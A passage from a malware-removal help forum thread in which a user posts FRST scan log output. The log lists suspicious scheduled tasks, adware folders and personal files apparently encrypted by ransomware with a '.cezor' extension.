    2019-07-08 16:17 - 2019-07-08 16:17 - 000000000 ___DC C:\SystemID
    2019-07-08 16:14 - 2019-07-09 15:59 - 000000000 ____D C:\Users\ADMIN\AppData\Local\dc987dec-8cfa-49ee-8d5d-aa82c048178f
    2019-07-08 16:14 - 2019-07-09 15:06 - 000003448 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 711520318
    2019-07-08 16:14 - 2019-07-08 16:14 - 000003682 _____ C:\Windows\System32\Tasks\Time Trigger Task
    2019-07-08 16:13 - 2019-07-10 17:30 - 000000342 _____ C:\Windows\Tasks\Online Application V2G6.job
    2019-07-08 16:13 - 2019-07-10 17:30 - 000000342 _____ C:\Windows\Tasks\Online Application V2G5.job
    2019-07-08 16:13 - 2019-07-10 17:30 - 000000342 _____ C:\Windows\Tasks\Online Application V2G4.job
    2019-07-08 16:13 - 2019-07-10 17:26 - 000000342 _____ C:\Windows\Tasks\Online Application V2G3.job
    2019-07-08 16:13 - 2019-07-10 17:26 - 000000342 _____ C:\Windows\Tasks\Online Application V2G2.job
    2019-07-08 16:13 - 2019-07-10 17:26 - 000000342 _____ C:\Windows\Tasks\Online Application V2G1.job
    2019-07-08 16:13 - 2019-07-10 16:16 - 000000374 _____ C:\Windows\Tasks\Updater_Online_Application.job
    2019-07-08 16:13 - 2019-07-09 15:59 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\eppsrq3otww
    2019-07-08 16:13 - 2019-07-09 15:59 - 000000000 ____D C:\Program Files\S2SM7ZWF99
    2019-07-08 16:13 - 2019-07-09 15:59 - 000000000 ____D C:\Program Files (x86)\Reciper
    2019-07-08 16:13 - 2019-07-09 15:06 - 000003250 __RSH C:\ProgramData\ntuser.pol
    2019-07-08 16:13 - 2019-07-08 16:13 - 000825856 ____C C:\Default.xml
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003206 _____ C:\Windows\System32\Tasks\Updater_Online_Application
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G6
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G5
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G4
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G3
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G2
    2019-07-08 16:13 - 2019-07-08 16:13 - 000003170 _____ C:\Windows\System32\Tasks\Online Application V2G1
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\Microleaves
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\EpicNet Inc
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Users\ADMIN\AppData\Local\AdvinstAnalytics
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Program Files (x86)\Seed Trade
    2019-07-08 16:13 - 2019-07-08 16:13 - 000000000 ____D C:\Program Files (x86)\Microleaves
    2019-07-08 16:12 - 2019-07-09 18:05 - 000000000 ____D C:\ProgramData\Logic Cramble
    2019-07-08 16:12 - 2019-07-09 15:07 - 000003486 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2019-07-08 16:12 - 2019-07-09 15:07 - 000003178 _____ C:\Windows\System32\Tasks\csrss
    2019-07-08 16:12 - 2019-07-08 16:12 - 001895383 _____ C:\Users\ADMIN\AppData\Local\Villalux.bin
    2019-07-08 16:12 - 2019-07-08 16:12 - 001435136 ____N C:\Windows\windefender.exe
    2019-07-08 16:12 - 2019-07-08 16:12 - 000015606 _____ C:\Windows\SysWOW64\findit.xml
    2019-07-08 16:12 - 2019-07-08 16:12 - 000000000 ____D C:\ProgramData\Quoteexs
    2019-07-08 16:12 - 2019-07-08 16:12 - 000000000 ____D C:\Program Files (x86)\foldershare
    2019-07-08 16:11 - 2019-07-09 16:09 - 000000000 ___HD C:\Windows\rss
    2019-07-08 16:11 - 2019-07-08 16:38 - 000722944 _____ C:\Users\ADMIN\AppData\Local\sha.db
    2019-07-08 16:11 - 2019-07-08 16:11 - 007942656 _____ C:\Users\ADMIN\AppData\Local\agent.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 002039119 _____ C:\Users\ADMIN\AppData\Local\Don-Sing.tst
    2019-07-08 16:11 - 2019-07-08 16:11 - 000140800 _____ C:\Users\ADMIN\AppData\Local\installer.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000126464 _____ C:\Users\ADMIN\AppData\Local\noah.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000126464 _____ C:\Users\ADMIN\AppData\Local\lobby.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000072787 _____ C:\Users\ADMIN\AppData\Local\GreenZuntouch.tst
    2019-07-08 16:11 - 2019-07-08 16:11 - 000070992 _____ C:\Users\ADMIN\AppData\Local\Config.xml
    2019-07-08 16:11 - 2019-07-08 16:11 - 000054272 _____ C:\Users\ADMIN\AppData\Local\ApplicationHosting.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000018432 _____ C:\Users\ADMIN\AppData\Local\Main.dat
    2019-07-08 16:11 - 2019-07-08 16:11 - 000016416 _____ C:\Users\ADMIN\AppData\Local\InstallationConfiguration.xml
    2019-07-08 16:11 - 2019-07-08 16:11 - 000005568 _____ C:\Users\ADMIN\AppData\Local\md.xml
    2019-07-08 16:11 - 2019-07-08 16:11 - 000000000 ____D C:\ProgramData\CloudPrinter
    2019-07-03 14:50 - 2019-07-03 14:50 - 000196533 _____ C:\Users\ADMIN\AppData\Roaming\Beguk
    2019-06-25 14:31 - 2019-06-25 14:31 - 000250751 _____ C:\Users\ADMIN\AppData\Roaming\Gisigo
    2019-06-24 16:29 - 2019-06-24 16:29 - 000171376 _____ C:\Windows\ntbtlog.txt
    2019-06-21 17:53 - 2019-06-21 17:54 - 000000000 ____D C:\Users\ADMIN\Desktop\versues
    2019-06-21 17:48 - 2019-06-21 17:48 - 000000000 ____D C:\Users\ADMIN\Documents\Pvp TP
    2019-06-21 17:47 - 2019-07-09 15:36 - 000360487 _____ C:\Users\ADMIN\Documents\Pvp TP.zip.cezor
    2019-06-17 12:50 - 2019-06-17 12:50 - 000337779 _____ C:\Users\ADMIN\AppData\Roaming\Bopirolifeb
    2019-06-14 14:57 - 2019-06-14 14:57 - 000000000 ____D C:\Users\ADMIN\Desktop\Faithful
    2019-06-13 15:19 - 2019-06-13 15:19 - 000000639 _____ C:\Users\ADMIN\Desktop\OptiFine_1.13.2_HD_U_E7.lnk

    ==================== One month (modified) ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2019-07-10 17:14 - 2015-11-07 09:12 - 000000388 _____ C:\Windows\Tasks\update-sys.job
    2019-07-10 17:13 - 2019-02-27 20:13 - 000000270 _____ C:\Windows\Tasks\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072}.job
    2019-07-10 17:13 - 2018-10-29 14:31 - 000000413 _____ C:\Users\ADMIN\AppData\Roaming\WB.CFG
    2019-07-10 17:00 - 2018-10-28 17:30 - 000000558 _____ C:\Windows\Tasks\Yahoo! Powered rasin.job
    2019-07-10 17:00 - 2018-10-28 17:30 - 000000000 ____D C:\ProgramData\{C7A902CA-4DEB-880C-CB2D-164E516F9D80}
    2019-07-10 16:50 - 2019-03-31 00:14 - 000000282 _____ C:\Windows\Tasks\{633E5C42-23C4-ABE8-66E1-2266DBE038D4}.job
    2019-07-10 16:23 - 2009-07-14 10:15 - 000016944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2019-07-10 16:23 - 2009-07-14 10:15 - 000016944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2019-07-10 16:19 - 2009-07-14 10:43 - 000713888 _____ C:\Windows\system32\PerfStringBackup.INI
    2019-07-10 16:19 - 2009-07-14 08:50 - 000000000 ____D C:\Windows\inf
    2019-07-10 16:18 - 2018-08-13 19:10 - 000004294 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{908EB34C-ED29-443A-A938-EB5B6D9C0525}
    2019-07-10 16:15 - 2018-06-25 19:44 - 000065536 _____ C:\Windows\system32\Ikeext.etl
    2019-07-10 16:15 - 2015-11-07 13:59 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\uTorrent
    2019-07-10 16:14 - 2009-07-14 10:38 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2019-07-09 20:58 - 2009-07-14 08:50 - 000000000 ____D C:\Windows\tracing
    2019-07-09 18:05 - 2019-03-31 00:14 - 000000000 ____D C:\Users\ADMIN\AppData\Roaming\633e5c4223c4abe866e12266dbe038d4
    2019-07-09 17:45 - 2015-11-07 09:12 - 000000388 _____ C:\Windows\Tasks\update-S-1-5-21-3161437104-263828448-1275724104-1000.job
    2019-07-09 16:00 - 2015-12-10 18:16 - 000000000 ___SD C:\Users\ADMIN\AppData\LocalLow\Temp
    2019-07-09 15:37 - 2019-02-18 13:47 - 000000000 ____D C:\Users\ADMIN\Desktop\RedBoy 3.2.1
    2019-07-09 15:37 - 2019-02-08 21:07 - 000016837 _____ C:\Users\ADMIN\Downloads\unknown.png.cezor
    2019-07-09 15:37 - 2019-02-03 21:54 - 006177443 _____ C:\Users\ADMIN\Downloads\[STATION 3] NCT DREAM 엔시티 드림 사랑한단 뜻이야 (Candle Light) MV.mp3.cezor
    2019-07-09 15:37 - 2019-02-03 21:54 - 000239157 _____ C:\Users\ADMIN\Downloads\Then You Think Again.pdf.cezor
    2019-07-09 15:37 - 2019-02-03 21:54 - 000130035 _____ C:\Users\ADMIN\Downloads\Then You Think Again.txt.cezor
    2019-07-09 15:37 - 2019-02-03 21:51 - 006915350 _____ C:\Users\ADMIN\Downloads\WayV 威神V 梦想发射计划 (Dream Launch) MV.mp3.cezor
    2019-07-09 15:37 - 2019-01-25 22:33 - 000145074 _____ C:\Users\ADMIN\Downloads\The Bedwarmer and the Reluctant.pdf.cezor
    2019-07-09 15:37 - 2019-01-24 21:32 - 000074308 _____ C:\Users\ADMIN\Downloads\Strangers on a Plane.pdf.cezor
    2019-07-09 15:37 - 2019-01-24 21:32 - 000030577 _____ C:\Users\ADMIN\Downloads\Strangers on a Plane.txt.cezor
    2019-07-09 15:37 - 2019-01-22 23:20 - 000101057 _____ C:\Users\ADMIN\Downloads\Spartacus and the Open Taxi.pdf.cezor
    2019-07-09 15:37 - 2019-01-22 23:20 - 000052326 _____ C:\Users\ADMIN\Downloads\Spartacus and the Open Taxi.txt.cezor
    2019-07-09 15:37 - 2019-01-22 23:17 - 000035702 _____ C:\Users\ADMIN\Downloads\ssj.txt.cezor
    2019-07-09 15:37 - 2019-01-22 23:16 - 000079221 _____ C:\Users\ADMIN\Downloads\ssj.pdf.cezor
    2019-07-09 15:37 - 2019-01-21 21:36 - 008179663 _____ C:\Users\ADMIN\Downloads\WAYV - 'COME BACK' LYRICS COLOR CODED [CHNROMENG].mp4.cezor
    2019-07-09 15:37 - 2019-01-21 21:35 - 005058984 _____ C:\Users\ADMIN\Downloads\WAYV - 'COME BACK' LYRICS COLOR CODED [CHNROMENG].mp3.cezor
    2019-07-09 15:37 - 2019-01-20 20:50 - 000663264 _____ C:\Users\ADMIN\Downloads\The Crown of the Summer Court.pdf.cezor
    2019-07-09 15:37 - 2019-01-20 20:50 - 000138345 _____ C:\Users\ADMIN\Downloads\The Crown of the Summer Court.txt.cezor
    2019-07-09 15:37 - 2019-01-19 14:33 - 001172537 _____ C:\Users\ADMIN\Downloads\The Student Prince.pdf.cezor
    2019-07-09 15:37 - 2019-01-19 14:33 - 000830709 _____ C:\Users\ADMIN\Downloads\The Student Prince.txt.cezor
    2019-07-09 15:37 - 2019-01-19 14:26 - 000269725 _____ C:\Users\ADMIN\Downloads\Youd fit my lonely arms so.pdf.cezor
    2019-07-09 15:37 - 2019-01-19 14:26 - 000148504 _____ C:\Users\ADMIN\Downloads\Youd fit my lonely arms so.txt.cezor
    2019-07-09 15:37 - 2019-01-18 15:59 - 000096810 _____ C:\Users\ADMIN\Downloads\The Emperor and the Star.txt.cezor
    2019-07-09 15:37 - 2019-01-18 15:55 - 000163852 _____ C:\Users\ADMIN\Downloads\The Emperor and the Star.pdf.cezor
    2019-07-09 15:37 - 2019-01-17 21:30 - 000670481 _____ C:\Users\ADMIN\Downloads\The Love of a Good Wizard.pdf.cezor
    2019-07-09 15:37 - 2019-01-17 21:30 - 000431762 _____ C:\Users\ADMIN\Downloads\The Love of a Good Wizard.txt.cezor
    2019-07-09 15:37 - 2019-01-16 13:28 - 000243921 _____ C:\Users\ADMIN\Downloads\to be first to be best.pdf.cezor
    2019-07-09 15:37 - 2019-01-16 13:28 - 000152568 _____ C:\Users\ADMIN\Downloads\to be first to be best.txt.cezor
    2019-07-09 15:37 - 2019-01-14 21:01 - 000124489 _____ C:\Users\ADMIN\Downloads\take my heart.pdf.cezor
    2019-07-09 15:37 - 2019-01-14 21:01 - 000061050 _____ C:\Users\ADMIN\Downloads\take my heart.txt.cezor
    2019-07-09 15:37 - 2019-01-13 22:36 - 004838928 _____ C:\Users\ADMIN\Downloads\[Stray Kids SKZ-PLAYER] Bang Chan X Changbin X HAN.mp3.cezor
    2019-07-09 15:37 - 2019-01-11 21:51 - 006033246 _____ C:\Users\ADMIN\Downloads\Stray Kids Hellevator MV.mp3.cezor
    2019-07-09 15:37 - 2019-01-11 21:51 - 004931715 _____ C:\Users\ADMIN\Downloads\Stray Kids Voices Performance Video.mp3.cezor
    2019-07-09 15:37 - 2019-01-11 21:50 - 000230356 _____ C:\Users\ADMIN\Downloads\stranger danger.pdf.cezor
    2019-07-09 15:37 - 2019-01-11 21:50 - 000086715 _____ C:\Users\ADMIN\Downloads\stranger danger.txt.cezor
    2019-07-09 15:37 - 2019-01-10 21:37 - 005914128 _____ C:\Users\ADMIN\Downloads\[MV] THE BOYZ(더보이즈) No Air.mp3.cezor
    2019-07-09 15:37 - 2019-01-10 21:37 - 005447686 _____ C:\Users\ADMIN\Downloads\Stray Kids My Pace MV.mp3.cezor
    2019-07-09 15:37 - 2019-01-06 21:36 - 000000000 ____D C:\Users\ADMIN\Desktop\TheFastestMouseClicker
    2019-07-09 15:37 - 2019-01-03 22:01 - 000044829 _____ C:\Users\ADMIN\Downloads\Time After Time.txt.cezor
    2019-07-09 15:37 - 2019-01-03 22:00 - 000107992 _____ C:\Users\ADMIN\Downloads\Time After Time.pdf.cezor
    2019-07-09 15:37 - 2019-01-02 21:38 - 000141551 _____ C:\Users\ADMIN\Downloads\what light through yonder.pdf.cezor
    2019-07-09 15:37 - 2019-01-02 21:38 - 000083045 _____ C:\Users\ADMIN\Downloads\what light through yonder.txt.cezor
    2019-07-09 15:37 - 2018-12-30 22:46 - 003818899 _____ C:\Users\ADMIN\Downloads\XO- The Eden Project (Lyrics).mp3.cezor
    2019-07-09 15:37 - 2018-12-30 22:46 - 000640667 _____ C:\Users\ADMIN\Downloads\were on a highway to hell.txt.cezor
    2019-07-09 15:37 - 2018-12-30 22:45 - 001114723 _____ C:\Users\ADMIN\Downloads\were on a highway to hell.pdf.cezor
    2019-07-09 15:37 - 2018-12-30 16:12 - 000000000 ____D C:\Users\ADMIN\Documents\Bandicam
    2019-07-09 15:37 - 2018-12-26 21:32 - 000040034 _____ C:\Users\ADMIN\Downloads\Where Is Peter Parker.txt.cezor
    2019-07-09 15:37 - 2018-12-26 21:31 - 000095254 _____ C:\Users\ADMIN\Downloads\Where Is Peter Parker.pdf.cezor
    2019-07-09 15:37 - 2018-12-15 23:07 - 000299682 _____ C:\Users\ADMIN\Downloads\this city bleeds its aching.pdf.cezor
    2019-07-09 15:37 - 2018-12-15 23:07 - 000193815 _____ C:\Users\ADMIN\Downloads\this city bleeds its aching.txt.cezor
    2019-07-09 15:37 - 2018-12-13 21:19 - 000083244 _____ C:\Users\ADMIN\Downloads\Those walls I built didnt.txt.cezor
    2019-07-09 15:37 - 2018-12-13 21:19 - 000029850 _____ C:\Users\ADMIN\Downloads\Wisdom Teeth Woes.txt.cezor
    2019-07-09 15:37 - 2018-12-13 21:17 - 000166178 _____ C:\Users\ADMIN\Downloads\Those walls I built didnt.pdf.cezor
    2019-07-09 15:37 - 2018-12-13 21:05 - 000090849 _____ C:\Users\ADMIN\Downloads\Wisdom Teeth Woes.pdf.cezor
    2019-07-09 15:37 - 2018-12-11 21:23 - 000014998 _____ C:\Users\ADMIN\Downloads\That Part Where You Said.txt.cezor
    2019-07-09 15:37 - 2018-12-11 21:22 - 000056227 _____ C:\Users\ADMIN\Downloads\That Part Where You Said.pdf.cezor
    2019-07-09 15:37 - 2018-12-11 16:36 - 000024377 _____ C:\Users\ADMIN\Downloads\Wo Rauch Ist.txt.cezor
    2019-07-09 15:37 - 2018-12-11 16:35 - 000119069 _____ C:\Users\ADMIN\Downloads\took no time with the fall.pdf.cezor
    2019-07-09 15:37 - 2018-12-11 16:35 - 000087673 _____ C:\Users\ADMIN\Downloads\Wo Rauch Ist.pdf.cezor
    2019-07-09 15:37 - 2018-12-11 16:35 - 000050479 _____ C:\Users\ADMIN\Downloads\took no time with the fall.txt.cezor
    2019-07-09 15:37 - 2018-12-09 20:51 - 000013947 _____ C:\Users\ADMIN\Downloads\yeah.jpg.cezor
    2019-07-09 15:37 - 2018-12-09 20:50 - 000051427 _____ C:\Users\ADMIN\Downloads\yea.jpg.cezor
    2019-07-09 15:37 - 2018-12-08 16:52 - 000066056 _____ C:\Users\ADMIN\Downloads\ten.jpg.cezor
    2019-07-09 15:37 - 2018-12-08 16:52 - 000053429 _____ C:\Users\ADMIN\Downloads\tae.jpg.cezor
    2019-07-09 15:37 - 2018-12-07 13:46 - 000069133 _____ C:\Users\ADMIN\Downloads\taeyongie.jpg.cezor
    2019-07-09 15:37 - 2018-12-07 13:45 - 000310359 _____ C:\Users\ADMIN\Downloads\taeyong.jpg.cezor
    2019-07-09 15:37 - 2018-12-07 13:43 - 000062901 _____ C:\Users\ADMIN\Downloads\tumblr_pf3crt64Mj1ww10eeo7_640.jpg.cezor
    2019-07-09 15:37 - 2018-12-06 22:51 - 000073150 _____ C:\Users\ADMIN\Downloads\wonHoe.png.cezor
    2019-07-09 15:37 - 2018-12-06 22:49 - 000019519 _____ C:\Users\ADMIN\Downloads\wonho.jpg.cezor
    2019-07-09 15:37 - 2018-12-06 22:40 - 000381320 _____ C:\Users\ADMIN\Downloads\the color red.pdf.cezor
    2019-07-09 15:37 - 2018-12-05 22:50 - 000349116 _____ C:\Users\ADMIN\Downloads\Unwritten.pdf.cezor
    2019-07-09 15:37 - 2018-12-05 22:50 - 000209893 _____ C:\Users\ADMIN\Downloads\Unwritten.txt.cezor
    2019-07-09 15:37 - 2018-12-01 23:05 - 004513547 _____ C:\Users\ADMIN\Downloads\[STATION] TEN 텐 'New Heroes' MV.mp3.cezor
    2019-07-09 15:37 - 2018-11-26 21:39 - 005076538 _____ C:\Users\ADMIN\Downloads\[MV] SEVENTEEN(세븐틴) - 어쩌나 (Oh My!).mp3.cezor
    2019-07-09 15:37 - 2018-11-22 22:35 - 000210228 _____ C:\Users\ADMIN\Downloads\That Old Black Magic.txt.cezor
    2019-07-09 15:37 - 2018-11-22 22:34 - 000308574 _____ C:\Users\ADMIN\Downloads\That Old Black Magic.pdf.cezor
    2019-07-09 15:37 - 2018-11-21 21:25 - 000074302 _____ C:\Users\ADMIN\Downloads\The Electric Fizzing Prick.pdf.cezor
    2019-07-09 15:37 - 2018-11-21 21:25 - 000024761 _____ C:\Users\ADMIN\Downloads\The Electric Fizzing Prick.txt.cezor
    2019-07-09 15:37 - 2018-11-12 22:39 - 006441384 _____ C:\Users\ADMIN\Downloads\유희열의 스케치북 - 몬스타엑스 - Versace On Floor 20181109.mp3.cezor
    2019-07-09 15:37 - 2018-11-04 12:55 - 000299230 _____ C:\Users\ADMIN\Downloads\tumblr_ow13bbRMqi1tiidtho5_1280.png.cezor
    2019-07-09 15:37 - 2018-11-02 17:07 - 000170544 _____ C:\Users\ADMIN\Downloads\tumblr_pfuqu3BGDa1xdpcw1o2_400.png.cezor
    2019-07-09 15:37 - 2018-11-02 16:56 - 000205486 _____ C:\Users\ADMIN\Downloads\tumblr_pfbt9jgOfa1xdpcw1o2_400.png.cezor
    2019-07-09 15:37 - 2018-11-02 16:48 - 000115764 _____ C:\Users\ADMIN\Downloads\superthumb (2).png.cezor
    2019-07-09 15:37 - 2018-11-02 16:47 - 000125505 _____ C:\Users\ADMIN\Downloads\superthumb (1).png.cezor
    2019-07-09 15:37 - 2018-11-02 16:44 - 000110879 _____ C:\Users\ADMIN\Downloads\superthumb.png.cezor
    2019-07-09 15:37 - 2018-11-02 16:24 - 000053201 _____ C:\Users\ADMIN\Downloads\sun-moon-firered-b1.51.sgm.cezor
    2019-07-09 15:37 - 2018-11-01 20:26 - 000131150 _____ C:\Users\ADMIN\Downloads\sun-moon-firered-b1.5.sav.cezor
    2019-07-09 15:37 - 2018-11-01 20:22 - 006383629 _____ C:\Users\ADMIN\Downloads\sun-moon-firered-b1.5.zip.cezor
    2019-07-09 15:37 - 2018-10-30 21:29 - 000041086 _____ C:\Users\ADMIN\Downloads\Sweet Quiznak.txt.cezor
    2019-07-09 15:37 - 2018-10-30 21:27 - 000101610 _____ C:\Users\ADMIN\Downloads\Sweet Quiznak.pdf.cezor
    2019-07-09 15:37 - 2018-10-28 13:30 - 000227882 _____ C:\Users\ADMIN\Downloads\tumblr_pgtg0rOTcW1xdpcw1o1_400.png.cezor
    2019-07-09 15:37 - 2018-10-28 13:30 - 000215081 _____ C:\Users\ADMIN\Downloads\tumblr_pgtg0rOTcW1xdpcw1o2_400.png.cezor
    2019-07-09 15:37 - 2018-10-27 15:53 - 000210612 _____ C:\Users\ADMIN\Downloads\Stilinskis Home for Wayward.txt.cezor
    2019-07-09 15:37 - 2018-10-27 15:52 - 000322011 _____ C:\Users\ADMIN\Downloads\Stilinskis Home for Wayward.pdf.cezor
    2019-07-09 15:37 - 2018-10-22 17:08 - 000213049 _____ C:\Users\ADMIN\Downloads\tumblr_oy35hi0fZl1ul5fqko1_1280.jpg.cezor
    2019-07-09 15:37 - 2018-10-22 17:08 - 000071605 _____ C:\Users\ADMIN\Downloads\tumblr_oxfabpRQxt1qj47bio1_1280.png.cezor
    2019-07-09 15:37 - 2018-10-22 17:06 - 000085693 _____ C:\Users\ADMIN\Downloads\tumblr_oeea7gYbJg1vbuge9o1_640.jpg.cezor
    2019-07-09 15:37 - 2018-10-22 17:05 - 000289531 _____ C:\Users\ADMIN\Downloads\tumblr_ow5olcg5np1tx7huro1_1280.jpg.cezor
    2019-07-09 15:37 - 2018-10-22 17:03 - 000021316 _____ C:\Users\ADMIN\Downloads\tumblr_oz0aopBytQ1vsboz2o1_1280.jpg.cezor
     
  4. nekoshoyo

    nekoshoyo Thread Starter

    Joined:
    Jul 9, 2019
    Messages:
    12
    FRST.txt (Part 2):

    2019-07-09 15:37 - 2018-10-21 18:35 - 000038332 _____ C:\Users\ADMIN\Downloads\theres a heart stain on the.txt.cezor
    2019-07-09 15:37 - 2018-10-21 18:35 - 000009624 _____ C:\Users\ADMIN\Downloads\you stole a pizza my heart.txt.cezor
    2019-07-09 15:37 - 2018-10-21 18:34 - 000096611 _____ C:\Users\ADMIN\Downloads\theres a heart stain on the.pdf.cezor
    2019-07-09 15:37 - 2018-10-21 18:34 - 000047705 _____ C:\Users\ADMIN\Downloads\you stole a pizza my heart.pdf.cezor
    2019-07-09 15:37 - 2018-10-19 22:33 - 000070339 _____ C:\Users\ADMIN\Downloads\the rain falls for you.pdf.cezor
    2019-07-09 15:37 - 2018-10-19 22:33 - 000024127 _____ C:\Users\ADMIN\Downloads\the rain falls for you2.txt.cezor
    2019-07-09 15:37 - 2018-10-16 19:16 - 000096669 _____ C:\Users\ADMIN\Downloads\tumblr_p3fvqphgRt1vxe4v6o1_500.png.cezor
    2019-07-09 15:37 - 2018-10-15 16:50 - 000141240 _____ C:\Users\ADMIN\Downloads\tumblr_p128ohZzuO1tu0yl5o1_500.gif.cezor
    2019-07-09 15:37 - 2018-10-15 16:48 - 000291562 _____ C:\Users\ADMIN\Downloads\waa.png.cezor
    2019-07-09 15:37 - 2018-10-15 16:33 - 002167120 _____ C:\Users\ADMIN\Downloads\tenor.gif.cezor
    2019-07-09 15:37 - 2018-10-15 16:27 - 000000000 ____D C:\Users\ADMIN\Downloads\jaemin pics (@najaeminpics) _ Twitter_files
    2019-07-09 15:37 - 2018-10-13 23:48 - 000249798 _____ C:\Users\ADMIN\Downloads\tumblr_ow2jhkQQ5t1sy4y3mo6_1280.png.cezor
    2019-07-09 15:37 - 2018-10-13 23:38 - 000040785 _____ C:\Users\ADMIN\Downloads\tumblr_p70is2YarJ1xnrvkgo1_500.jpg.cezor
    2019-07-09 15:37 - 2018-09-29 19:05 - 006186847 _____ C:\Users\ADMIN\Downloads\[STATION] NCT U 텐데... (Timeless) Live Video.mp3.cezor
    2019-07-09 15:37 - 2018-09-05 12:26 - 000000000 ____D C:\Users\ADMIN\Documents\Outlook Files
    2019-07-09 15:37 - 2018-08-26 17:33 - 000000000 ___SD C:\Users\ADMIN\Documents\My Data Sources
    2019-07-09 15:37 - 2018-08-17 13:19 - 005835474 _____ C:\Users\ADMIN\Downloads\「Nightcore」→ Havana ✗ Despacito ✗ Believer ✗ Shape of you ✗ Rockabye and MORE (Switching Vocal) (2).avi.cezor
    2019-07-09 15:37 - 2018-08-17 13:16 - 002808078 _____ C:\Users\ADMIN\Downloads\「Nightcore」→ Havana ✗ Despacito ✗ Believer ✗ Shape of you ✗ Rockabye and MORE (Switching Vocal).mp3.cezor
    2019-07-09 15:37 - 2018-08-17 13:15 - 021480940 _____ C:\Users\ADMIN\Downloads\「Nightcore」→ Havana ✗ Despacito ✗ Believer ✗ Shape of you ✗ Rockabye and MORE (Switching Vocal) (1).avi.cezor
    2019-07-09 15:37 - 2018-08-17 13:02 - 021480940 _____ C:\Users\ADMIN\Downloads\「Nightcore」→ Havana ✗ Despacito ✗ Believer ✗ Shape of you ✗ Rockabye and MORE (Switching Vocal).avi.cezor
    2019-07-09 15:37 - 2018-08-11 23:35 - 000145462 _____ C:\Users\ADMIN\Downloads\tumblr_nkd5yfW2461ts5yjso2_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 23:35 - 000119729 _____ C:\Users\ADMIN\Downloads\tumblr_nkd5yfW2461ts5yjso1_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 23:26 - 000188932 _____ C:\Users\ADMIN\Downloads\tumblr_p63l5kZSwp1ws6v9po1_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 23:26 - 000187620 _____ C:\Users\ADMIN\Downloads\tumblr_p63l5kZSwp1ws6v9po2_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 23:24 - 000143726 _____ C:\Users\ADMIN\Downloads\tumblr_p1kpahNNyk1vbx9r9o2_400.png.cezor
    2019-07-09 15:37 - 2018-08-11 20:37 - 000160329 _____ C:\Users\ADMIN\Downloads\tumblr_o2v67e8gut1rr9hsgo2_r2_500.png.cezor
    2019-07-09 15:37 - 2018-08-11 20:37 - 000138967 _____ C:\Users\ADMIN\Downloads\tumblr_o2v67e8gut1rr9hsgo1_r2_500.png.cezor
    2019-07-09 15:37 - 2018-08-11 20:35 - 000100553 _____ C:\Users\ADMIN\Downloads\tumblr_o0wan1ry491uibbmuo2_1280.jpg.cezor
    2019-07-09 15:37 - 2018-08-11 20:35 - 000099921 _____ C:\Users\ADMIN\Downloads\tumblr_o0wan1ry491uibbmuo1_1280.jpg.cezor
    2019-07-09 15:37 - 2018-08-11 20:31 - 000092224 _____ C:\Users\ADMIN\Downloads\tumblr_p64ts6LyfT1x4d20bo1_1280.jpg.cezor
    2019-07-09 15:37 - 2018-08-11 20:31 - 000075292 _____ C:\Users\ADMIN\Downloads\tumblr_p64ts6LyfT1x4d20bo2_1280.jpg.cezor
    2019-07-09 15:37 - 2018-08-03 18:13 - 005758648 _____ C:\Users\ADMIN\Downloads\[MV] 이달의 소녀최리 (LOONAChoerry) Love Cherry Motion.mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:11 - 005312268 _____ C:\Users\ADMIN\Downloads\Touch - Troye Sivan (Lyrics).mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:08 - 004951151 _____ C:\Users\ADMIN\Downloads\【Nightcore】→ Jar Of Hearts ( Switching Vocals ) Lyrics.mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:07 - 005601287 _____ C:\Users\ADMIN\Downloads\Troye Sivan - Dance To This (Official Audio) ft. Ariana Grande.mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:07 - 004508532 _____ C:\Users\ADMIN\Downloads\♪ Nightcore - Just Like Fire Heart Attack (Switching Vocals).mp3.cezor
    2019-07-09 15:37 - 2018-08-03 18:05 - 005417594 _____ C:\Users\ADMIN\Downloads\Troye Sivan - Bloom (Lyric Video).mp3.cezor
    2019-07-09 15:37 - 2018-07-28 19:46 - 000000000 ____D C:\Users\ADMIN\Desktop\op songs for being pro
    2019-07-09 15:37 - 2018-07-28 15:22 - 002527046 _____ C:\Users\ADMIN\Downloads\UnacceptableSplendidApatosaur-size_restricted.gif.cezor
    2019-07-09 15:37 - 2018-07-25 15:28 - 000035144 _____ C:\Users\ADMIN\Downloads\Tumblr_n8o1cv3yPA1snc5kxo1_r3_500.png.cezor
